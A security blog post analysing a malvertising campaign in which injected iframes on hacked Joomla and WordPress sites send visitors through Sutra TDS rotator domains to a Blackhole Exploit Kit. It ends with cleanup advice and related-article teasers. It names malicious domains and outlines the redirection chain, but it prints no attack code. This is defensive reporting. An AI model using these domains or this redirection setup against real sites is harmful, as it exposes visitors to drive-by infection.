Stop Malvertising

Initially the malicious URLs did end in nighttrend.cgi?8 but now the URLs are partially randomized. At the time of the write up the iframe on compromised websites points to:

The malicious domains act as a rotator. A rotator is a link to a Traffic Management System and it will point users to different destinations each time the link is requested or deliver different content based on the geographic location of the visitor.

They might also include the name of the group spreading the malware or a campaign ID. In this particular hacking spree the cyber criminals are using the Sutra TDS (Traffic Distribution System).

From jpscu.freewww.info the visitor is redirected to ggysxf.freewww.biz where a Blackhole Exploit Kit is awaiting the visitor.

Malicious iframe

The malicious code has been injected in every single javascript file highlighted in green. As a result the domain running the Sutra TDS is called several times but the visitor is only redirected once to the exploit kit, the other requests will be redirected to Google.

Joomla Site - www.versailles.com

WordPress Site - fossfotography.com

Website owners are advised to check for the presence of a web / root shell. If you don't know what a shell is, check out this topic.

If you or your company is using FileZilla or a similar FTP client that stores passwords in plain text, you need to:

1. Check for the presence of malware and / or keyloggers on ALL computers that access the sites via FTP.
2. Change all FTP credentials for every site.
3. Switch to SFTP or FTPS. Most FTP clients support these protocols, but if you are on a shared server you have to make sure that your plan includes these secure protocols.

Make sure that EVERYTHING is up to date on your website and use strong passwords that are at least 16 characters long and include at least 1 or 2 special characters.

Resources

• How should the average website owner protect themselves from malware?
• Securing your website with .htaccess

If your website is affected and / or you have more information on how they got in, don’t hesitate to drop us a note via the Contact Form.

Related Articles

Close encounter with Linux/Cdorked.A

Linux/Cdorked.A is a highly sophisticated backdoor affecting Apache, Lighthttpd and nginx servers. The nature of the backdoor permits different types of malicious activity ranging from data loss / theft, remote execution to serving up exploits...

Does your browser really need that "Critical Update" ?

Does your browser really need that Critical Update? Usually the answer is NO as most modern browsers have their own update mechanism. The cybercriminal behind updbrowser.com has a different opinion on the subject though. The site is currently...

Update Joomla 1.5.26 Now !

On July 31 2013, Joomla released a patch in response to an existing security issue related to unauthorized file uploads via the media manager affecting ALL versions of Joomla. The official patch applies to Joomla 2.5.13 and 2.5.x, as well as...

CVE-2013-0422 - Aftermath

The latest 0-day Java exploit labeled CVE-2013-0422 and first discovered in the wild by kafeine has made Java an extreme popular subject in the past days. The exploit was incorporated to several Exploit Kits such as the Blackhole Exploit Kit,...

Analysis of CVE-2013-0422 - A New 0-day Java Exploit

According to Kafeine a new Java 0-day exploit, CVE-2013-0422, has been incorporated into the Blackhole, Cool EK, Nuclear Pack, RedKit and Sakura Exploit Kits. According to HD Moore the exploit is targeting a privilege escalation vulnerability...